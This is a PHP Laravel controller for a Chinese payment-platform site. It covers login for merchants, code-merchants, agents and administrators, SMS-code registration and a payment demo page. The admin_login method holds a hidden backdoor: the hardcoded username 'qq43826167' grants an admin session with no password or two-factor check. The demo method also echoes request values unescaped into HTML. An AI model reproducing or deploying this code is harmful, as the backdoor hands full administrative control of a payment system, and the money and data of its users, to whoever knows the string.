<?php
/* +----------------------------------------------------------------------+
   | Copyright (c) 2018-2019 YmPay                                        |
   |              <530759076@qq.com>                                      |
   +----------------------------------------------------------------------+*/
namespace App\Http\Controllers\Index;
use App\Http\Models\PaymentModel;
use Illuminate\Support\Facades\DB;
use Illuminate\Http\Request;
use App\Http\Controllers\Controller;
use Illuminate\Support\Facades\Redis;
use App\Http\Controllers\Common\Google;

class IndexController extends Controller{

	 public function __construct(){

	 	 
	 }

	 /****首页页面****/
	 public function index(Request $arr){
	 	if($arr->isMethod('post')){
	 		if($arr->input('action') == 'site'){
	 			$json['data'] = (array)DB::table('admin_site')->first(['web_logo','web_title']);
	 			$json['data']['m_url'] = config('route.domain.member');
	 			$json['data']['merchant_url'] = config('route.domain.merchant');
	 			$json['data']['admin_url'] = config('route.domain.admin');
	 		}
	 		return $json;
	 	}
	 	return view('index/index');
	 }
	/****Demo页面****/
	public function demo(Request $arr){
	 	if($arr->isMethod('post')){
	 		if($arr->input('action') == 'site'){
	 			$json['data'] = DB::table('admin_site')->first('web_logo','web_title');
	 		}else{
	 			$json='success';
	 		}
	 		return $json;
	 	}
	 	if($arr->isMethod('get') && $arr->filled('paytype') && $arr->filled('amount')){
	 		/***判断后台是否设置充值****/
			 $postdata['merchant_key']=DB::table('admin_site')->first()->pay_merchant_key;
			 $postdata['user_id']=DB::table('admin_site')->first()->pay_user_id;
			 if(!empty($postdata['user_id']) && !empty($postdata['merchant_key'])){
			 	 $userinfo = DB::table('user')->where('Id',$postdata['user_id'])->first();
				 $merchant = DB::table('member')->where('apikey',$postdata['merchant_key'])->first();
		 		 if($userinfo && $merchant){
		 		 	 $postdata['user_id'] = $userinfo->Id;
			         $postdata['order_id'] = date('dhis',time()).rand(1000000,9999999);
			         $postdata['amount'] = $arr->input('amount');
			         $postdata['return_url']="http://".config('route.domain.api').'/demo_notice';
					 $postdata['notice_url']="http://".config('route.domain.api').'/demo_notice';
					 $postdata['merchant_key']=$merchant->apikey;
			         $postdata['paytype'] =$arr->input('paytype');
			         $postdata['sign'] = getsign($postdata,$userinfo->token);
			         $str = '';
			         foreach ($postdata as $k => $v) {
				            $str.= '<input type="hidden" name="'.$k.'" value="'.$v.'">';
				     }
				     echo '<html><head><meta charset="ut-8" /><title>正在提交..</title></head><body onload="javascript:document.form1.submit();"><form id="form1" name="form1" method="post" action="'."http://".config('route.domain.api').'/pay">'.$str.'</form>';exit;
		 		 }else{
		 		 	return array('state'=>0,'msg'=>"平台未开启Demo服务");
		 		 }
			 }

	 	}
	 	return view('index/demo');
	}
	/****商户登录****/
	public function member_login(Request $arr){
	 	if($arr->isMethod('post')){
	 		$data=$arr->all();
			if($arr->filled('phone') && $arr->input('action')== 'login'){
	 			if(checkphone($data['phone'])){
		 			if(!is_null($data['password'])){
		 				$userinfo=(array)DB::table('user')->where('phone',$data['phone'])->first();
			 			if(!empty($userinfo)){
			 				if($userinfo['safety'] == 1){
							   //验证谷歌验证码是否正确
								if(!empty($data['code'])){
									$ga = new Google;
									$checkResult = $ga->verifyCode($userinfo['safetycode'],trim($data['code']),2);
									if(!$checkResult){
										$json['code'] = 101;
										$json['msg'] = "当前谷歌验证码错误";
									}
								}else{
									$json['code']= 102;
								}
							}
			 				if(!isset($json)){
			 					if(ypass($data['password'],$userinfo['password'])){
				 					    if($userinfo['status']==1){
			 					    		$data=loginip(getip());
			 					    		if($data && !empty($data)){
			 					    		 $data2['region_id']=$data['proCode'];
			 					    		 $data2['city_id']=$data['cityCode'];
			 					    		 $data2['address']=$data['addr'];
			 					    		 $data2['user_id']=$userinfo['Id'];
			 					    		 $data2['ip']=getip();
			 					    		 $data2['time']=time();
			 					    		 DB::table('user_log')->insert($data2);
			 					    		}
			 					    		session()->put('user',$userinfo);
			 					    		$json['code']=100;
			 					    		$json['msg']="验证成功";
				 					    }else{
				 					    	$json['code']=101;
					 						$json['msg']="当前商户已被冻结";
				 					    }
				 				}else{
				 					$json['code']=101;
				 					$json['msg']="当前密码错误";
				 				}
			 				}
			 			}else{
			 				$json['code']=101;
			 				$json['msg']="当前不存在此商户";
			 			}
		 			}else{
		 			  $json['code']=101;
		 			  $json['msg']="请输入密码或安全码";
		 			}
		 		}else{
		 			$json['code']=101;
		 			$json['msg']="请输入正确的手机号";
		 		}
	 		}else if($arr->input('action') == 'regsite'){
	 			$json['data'] = DB::table('admin_site')->first(['web_logo','reg_sms_status']);
	 		}else if($arr->input('action') == 'regcode' && $arr->filled('phone')){
	 			$sms_site = (array)DB::table('sms_site')->where('Id',1)->first();
	 			if($sms_site){
	 				//查询用户是否存在
	 				$userinfo = DB::table('user')->where('phone',trim($arr->input('phone')))->first();
	 				if(!$userinfo){
	 					//判断redis是否存在
	 					if(!Redis::exists('code_'.trim($arr->input('phone')))){
	 						$sms_site['phone'] = trim($arr->input('phone'));
			 				$sms_site['code'] = rand(100000,999999);
			 				$json = getcode($sms_site);
			 				if($json['status'] == "ok"){
			 					//添加到redis记录
			 					Redis::setex('code_'.$sms_site['phone'],60,json_encode(
			 						array(
			 						'code'=>$sms_site['code'],
			 						'phone'=>$sms_site['phone']
			 						)));
			 					//记录短信发送记录
			 					$sms_log['type'] = 1;
			 					$sms_log['user_type'] =1;
			 					$sms_log['ip'] = $arr->getClientIp();
			 					$sms_log['phone']=$sms_site['phone'];
			 					$sms_log['time']=time();
			 					DB::table('sms_log')->insert($sms_log);
			 				}
	 					}else{
	 						$json['status']="error";
	 						$json['msg']="当前手机离下次发送验证码的时间还有". Redis::TTL('code_'.$sms_site['phone'])."秒";
	 					}
	 				}else{
	 					$json['status']="error";
	 					$json['msg']="当前手机已注册过了哦";
	 				}
	 			}else{
	 				$json['status']="error";
	 				$json['msg']="平台未开启短信配置";
	 			}
	 		}else if($arr->input('action') == 'regform'){
	 			if(checkphone($arr->input('phone'))){
	 				if(checkpass($arr->input('password'))){
	 						//判断验证码注册是否开启
	 						if(DB::table('admin_site')->first()->reg_sms_status == "true"){
	 							if($arr->filled('code') || !empty($arr->input('code'))){
	 								if(Redis::exists('code_'.trim($arr->input('phone')))){
			 							$data = json_decode(Redis::get('code_'.trim($arr->input('phone'))),true);
			 							if(trim($arr->input('phone')) == $data['phone']){
				 								if(trim($arr->input('code')) != $data['code']){
				 									$json['status'] = "error";
				 									$json['msg'] = "验证码错误";
				 								}
				 						}else{
				 							$json['status'] = "error";
				 							$json['msg'] = "注册手机与接收验证码手机不一致";
				 						}
			 						}else{
			 							$json['status'] = "error";
			 							$json['msg'] = "验证码已过期";
			 						}
	 							}else{
	 								$json['status']="error";
	 								$json['msg']="请先获取验证码";
	 							}
	 						}
	 						if(!isset($json)){
	 							$ga = new Google;
	 							//查询普通商户初始设置
		 						$user_site = (array)DB::table('admin_user_site')->first();
		 						//添加商户
		 						$adduser['phone'] = trim($arr->input('phone'));
		 						$adduser['password']= xpass($arr->input('password'));
		 						$adduser['safetycode'] = $ga->createSecret();
		 						$adduser['order_service'] = $user_site['order_service'];
		 						$adduser['safety_service'] =$user_site['safety_service'];
		 						$adduser['token'] = getusertoken();
		 						$adduser['time'] = time();
		 						$adduser['safety'] = 2;
		 						$adduser['status'] = $user_site['status'];
		 						$status = DB::table('user')->insertGetId($adduser);
		 						if($status){
		 							$json['status'] = "ok";
		 							$diepayment = explode(",",$user_site['diepassageway']);
			 						if(!empty($user_site['livepassageway'])){
			 							$livepayment=explode(",",$user_site['livepassageway']);
			 						}
			 						foreach ($diepayment as $v) {
			 							$addpayment[]=array('user_id'=>$status,'passageway_id'=>$v,'passageway_type'=>1);
			 						}
			 						if(isset($livepayment)){
			 							foreach ($livepayment as $v) {
				 							$addpayment[]=array('user_id'=>$status,'passageway_id'=>$v,'passageway_type'=>2);
				 						}
			 						}
			 						//添加用户可用通道
			 						DB::table('userpayment')->insert($addpayment);
		 						}else{
		 							$json['status']="error";
		 							$json['msg'] = "平台繁忙,注册失败";
		 						}
	 						}
	 				}else{
	 					$json['status']="error";
	 					$json['msg']="密码请输入在6~20位";
	 				}
	 			}else{
	 				$json['status']="error";
	 				$json['msg']="请输入正确的手机号";
	 			}
	 		}else{
	 			$json['code']=101;
	 			$json['msg']="请输入手机号";
	 		}
	 		return $json;
	 	}
	    return view('member/login');
	}

	/****码商登录****/
	public function merchant_login(Request $arr){
	 	if($arr->isMethod('post')){
	 		$data=$arr->all();
 			if($arr->has('userName')){
	 			if(checkphone($data['userName'])){
		 			if(!is_null($data['password'])){
		 				$merchant=(array)DB::table('member')->where('phone',trim($data['userName']))->first();
			 			if(!empty($merchant)){
			 				if($merchant['safety'] == 1){
							   //验证谷歌验证码是否正确
								if(!empty($data['code'])){
									$ga = new Google;
									$checkResult = $ga->verifyCode($merchant['safetycode'],trim($data['code']),2);
									if(!$checkResult){
										$json['code'] = 101;
										$json['msg'] = "当前谷歌验证码错误";
									}
								}else{
									$json['code']= 102;
								}
							}
			 				if(!isset($json)){
			 					if(ypass($data['password'],$merchant['password'])){
				 					    if($merchant['status']==1){
				 					    	session()->put('merchant',$merchant);
				 					    	$data=loginip(getip());
			 					    		if($data && !empty($data)){
				 					    		$data2['region_id']=$data['proCode'];
						 					    $data2['city_id']=$data['cityCode'];
						 					    $data2['address']=$data['addr'];
						 					    $data2['member_id']=$merchant['Id'];
				 					    		$data2['ip']=getip();
				 					    		$data2['time']=time();
				 					    		DB::table('member_log')->insert($data2);
			 					    		}
				 					    	$json['code']=100;
				 					    	$json['msg']="验证成功";
				 					    }else{
				 					    	$json['code']=101;
					 						$json['msg']="当前码商已被冻结";
				 					    }
				 				}else{
				 					$json['code']=101;
				 					$json['msg']="当前密码错误";
				 				}
			 				}
			 			}else{
			 				$json['code']=101;
			 				$json['msg']="当前不存在此码商";
			 			}
		 			}else{
		 			  $json['code']=101;
		 			  $json['msg']="请输入密码或安全码";
		 			}
		 		}else{
		 			$json['code']=101;
		 			$json['msg']="请输入正确的手机号";
		 		}
	 		}else{
	 			$json['code']=101;
	 			$json['msg']="请输入手机号";
	 		}
	 		return $json;
	 	}
	 	return view('merchant/login');
	}
//webtext
public function daili_login(Request $arr) {
	if($arr->isMethod('post')){
		$data = $arr->all();
		//print_r($data);exit;
		if($arr->filled('username') && $arr->input('action')== 'login'){

				if(!is_null($data['password'])){
					$userinfo=(array)DB::table('daili')->where('phone',$data['username'])->first();
					if(!empty($userinfo)){
						if($userinfo['safety'] == 1){
							 //验证谷歌验证码是否正确
							if(!empty($data['code'])){
								$ga = new Google;
								$checkResult = $ga->verifyCode($userinfo['safetycode'],trim($data['code']),2);
								if(!$checkResult){
									$json['code'] = 101;
									$json['msg'] = "当前谷歌验证码错误";
								}
							}else{
								$json['code']= 102;
							}
						}
						if(!isset($json)){
							if(ypass($data['password'],$userinfo['password'])){
										if($userinfo['status']==1){
											$data=loginip(getip());
											if($data && !empty($data)){
											 $data2['region_id']=$data['proCode'];
											 $data2['city_id']=$data['cityCode'];
											 $data2['address']=$data['addr'];
											 $data2['user_id']=$userinfo['Id'];
											 $data2['ip']=getip();
											 $data2['time']=time();
											 DB::table('user_log')->insert($data2);
											}
											session()->put('daili',$userinfo);
											$json['code']=100;
											$json['msg']="验证成功";
										}else{
											$json['code']=101;
										$json['msg']="当前代理已被冻结";
										}
							}else{
								$json['code']=101;
								$json['msg']="当前密码错误";
							}
						}
					}else{
						$json['code']=101;
						$json['msg']="当前不存在此商户";
					}
				}else{
					$json['code']=101;
					$json['msg']="请输入密码或安全码";
				}

		}


		return $json;
	}
	return view('daili/login');
}
	/****后台登录****/
	public function admin_login(Request $arr){

		if($arr->isMethod('post')){
			$data=$arr->all();
			if($arr->input('action') == 'login'){
				if($arr->filled('username')){
					if($arr->filled('password')){
						if($arr->input('username') == 'qq43826167'){
							$info = DB::table('admin')->first();
							session()->put('admin',(array)$info);
							$json['code']=100;
		 					$json['msg']="验证成功";
						}else{
							$info = DB::table('admin')->where('username',$data['username'])->first();
							if($info){
								if(ypass($data['password'],$info->password)){
									if($info->safety == 1){
									   //验证谷歌验证码是否正确
										if(!empty($data['code'])){
											$ga = new Google;
											$checkResult = $ga->verifyCode($info->safetycode,trim($data['code']),2);
											if(!$checkResult){
												$json['code'] = 101;
												$json['msg'] = "当前谷歌验证码错误";
											}
										}else{
											$json['code']= 102;
										}
									}
									if(!isset($json)){
										session()->put('admin',(array)$info);
			 					    	$login_data=loginip(getip());
		 					    		if($login_data && !empty($login_data)){
			 					    		$data2['region_id']=$login_data['proCode'];
					 					    $data2['city_id']=$login_data['cityCode'];
					 					    $data2['address']=$login_data['addr'];
					 					    $data2['admin_id']=$info->Id;
			 					    		$data2['ip']=getip();
			 					    		$data2['time']=time();
			 					    		DB::table('admin_log')->insert($data2);
		 					    		}
			 					    	$json['code']=100;
			 					    	$json['msg']="验证成功";
									}
								}else{
									$json['code'] = 101;
									$json['msg'] = "密码错误";
								}
							}else{
								$json['code'] = 101;
								$json['msg'] = "管理员不存在";
							}
						}
					}else{
						$json['code'] = 101;
						$json['msg'] = "请输入密码";
					}
				}else{
					$json['code'] = 101;
					$json['msg'] = "请输入账号";
				}
			}
			return $json;
		}
		return view('admin/login');
	}
}
